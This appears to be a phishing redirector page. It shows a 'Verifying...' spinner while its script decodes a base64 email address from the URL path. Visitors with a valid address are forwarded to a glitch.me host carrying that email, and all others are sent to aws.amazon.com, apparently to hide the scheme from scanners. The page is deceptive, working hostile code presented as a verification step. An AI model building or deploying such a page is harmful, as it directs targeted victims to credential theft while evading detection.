
<!DOCTYPE html>
<html>
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style>
      .loader {
        border: 16px solid #f3f3f3;
        border-radius: 50%;
        border-top: 16px solid #3498db;
        width: 120px;
        height: 120px;
        -webkit-animation: spin 2s linear infinite; /* Safari */
        animation: spin 2s linear infinite;
      }

      /* Safari */
      @-webkit-keyframes spin {
        0% {
          -webkit-transform: rotate(0deg);
        }
        100% {
          -webkit-transform: rotate(360deg);
        }
      }

      @keyframes spin {
        0% {
          transform: rotate(0deg);
        }
        100% {
          transform: rotate(360deg);
        }
      }
    </style>
  </head>
 <!-- <body
    style="
      background-image: url('https://fileqw.com/img/download_Nero AI.jpg');
    "
  >-->
  <body>
    <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
    <center>
      <h2>Verifying...</h2>

      <div class="loader"></div>
    </center>

<script>
  const validateEmail = (email) => {
    return email.match(
      /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/
    );
  };

  function isBase64(str) {
    try {
      return btoa(atob(str)) == str;
    } catch (err) {
      return false;
    }
  }


  function rd() {
    var query = window.location.href;
    query = decodeURIComponent(query);

    if (query) {
      var res = query.split("/"); //email
      var reslen = res.length;		  
      if (res.length > 3) {
        email = res[reslen-1];
        if (email) {
          try{
            email_64 = atob(email);          
            if (validateEmail(email_64)){
              location.replace("https://brassy-irradiated-whip.glitch.me#" + email_64);
              return;
            }
          }catch (err) {}
        }
      }
    }
    location.replace("https://aws.amazon.com");
  }

  window.onload = function () {  
    //rd();
	 setTimeout(rd, 3000);
  };
</script>
</body>
</html>
